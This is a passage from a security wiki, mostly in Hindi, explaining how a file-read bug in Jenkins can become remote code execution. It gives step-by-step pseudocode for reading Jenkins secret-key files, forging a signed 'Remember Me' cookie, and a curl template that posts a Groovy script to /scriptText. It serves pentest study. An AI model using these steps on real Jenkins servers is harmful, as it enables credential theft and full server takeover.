Jenkins Arbitrary File Read to RCE via "Remember Me"

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

इस ब्लॉग पोस्ट में एक शानदार तरीका है कि कैसे Jenkins में एक लोकल फाइल इनक्लूजन कमजोरियों को RCE में परिवर्तित किया जा सकता है: https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/

यह एक AI द्वारा बनाई गई संक्षेप है उस भाग की जिसमें एक मनमाना कुकी का निर्माण RCE प्राप्त करने के लिए किया जाता है, जब तक कि मेरे पास खुद का संक्षेप बनाने का समय नहीं है:

हमले की पूर्वापेक्षाएँ

विशेषता आवश्यकता: "Remember me" सक्षम होना चाहिए (डिफ़ॉल्ट सेटिंग)।
एक्सेस स्तर: हमलावर को समग्र/पढ़ने की अनुमति की आवश्यकता है।
गुप्त एक्सेस: प्रमुख फ़ाइलों से बाइनरी और पाठ्य सामग्री पढ़ने की क्षमता।

विस्तृत शोषण प्रक्रिया

चरण 1: डेटा संग्रहण

उपयोगकर्ता जानकारी पुनर्प्राप्ति

प्रत्येक उपयोगकर्ता के लिए $JENKINS_HOME/users/*.xml से उपयोगकर्ता कॉन्फ़िगरेशन और रहस्यों तक पहुँचें:
उपयोगकर्ता नाम
उपयोगकर्ता बीज
टाइमस्टैम्प
पासवर्ड हैश

गुप्त कुंजी निष्कर्षण

कुकी पर हस्ताक्षर करने के लिए उपयोग की जाने वाली क्रिप्टोग्राफिक कुंजियों को निकालें:
गुप्त कुंजी: $JENKINS_HOME/secret.key
मास्टर कुंजी: $JENKINS_HOME/secrets/master.key
MAC कुंजी फ़ाइल: $JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac

चरण 2: कुकी निर्माण

टोकन तैयारी

टोकन समाप्ति समय की गणना करें:

tokenExpiryTime = currentServerTimeInMillis() + 3600000  // Adds one hour to current time

टोकन के लिए डेटा को संयोजित करें:

token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey

MAC कुंजी डिक्रिप्शन

MAC कुंजी फ़ाइल को डिक्रिप्ट करें:

key = toAes128Key(masterKey)  // Convert master key to AES128 key format
decrypted = AES.decrypt(macFile, key)  // Decrypt the .mac file
if not decrypted.hasSuffix("::::MAGIC::::")
return ERROR;
macKey = decrypted.withoutSuffix("::::MAGIC::::")

हस्ताक्षर गणना

HMAC SHA256 की गणना करें:

mac = HmacSHA256(token, macKey)  // Compute HMAC using the token and MAC key
tokenSignature = bytesToHexString(mac)  // Convert the MAC to a hexadecimal string

कुकी एन्कोडिंग

अंतिम कुकी उत्पन्न करें:

cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature)  // Base64 encode the cookie data

चरण 3: कोड निष्पादन

सत्र प्रमाणीकरण

CSRF और सत्र टोकन प्राप्त करें:
/crumbIssuer/api/json पर एक अनुरोध करें ताकि Jenkins-Crumb प्राप्त किया जा सके।
प्रतिक्रिया से JSESSIONID कैप्चर करें, जिसका उपयोग याद रखने वाली कुकी के साथ किया जाएगा।

कमांड निष्पादन अनुरोध

Groovy स्क्रिप्ट के साथ POST अनुरोध भेजें:

curl -X POST "$JENKINS_URL/scriptText" \
--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
--header "Jenkins-Crumb: $CRUMB" \
--header "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "script=$SCRIPT"

Groovy स्क्रिप्ट का उपयोग सिस्टम-स्तरीय कमांड या Jenkins वातावरण के भीतर अन्य संचालन निष्पादित करने के लिए किया जा सकता है।

उदाहरण curl कमांड यह प्रदर्शित करता है कि कैसे आवश्यक हेडर और कुकी के साथ Jenkins को अनुरोध भेजा जाए ताकि मनमाना कोड सुरक्षित रूप से निष्पादित किया जा सके।

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousJenkins RCE Creating/Modifying Pipeline NextJenkins Dumping Secrets from Groovy

Last updated 3 days ago

key = toAes128Key(masterKey) // Convert master key to AES128 key format decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file if not decrypted.hasSuffix("::::MAGIC::::") return ERROR; macKey = decrypted.withoutSuffix("::::MAGIC::::")

curl -X POST "$JENKINS_URL/scriptText" \ --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ --header "Jenkins-Crumb: $CRUMB" \ --header "Content-Type: application/x-www-form-urlencoded" \ --data-urlencode "script=$SCRIPT"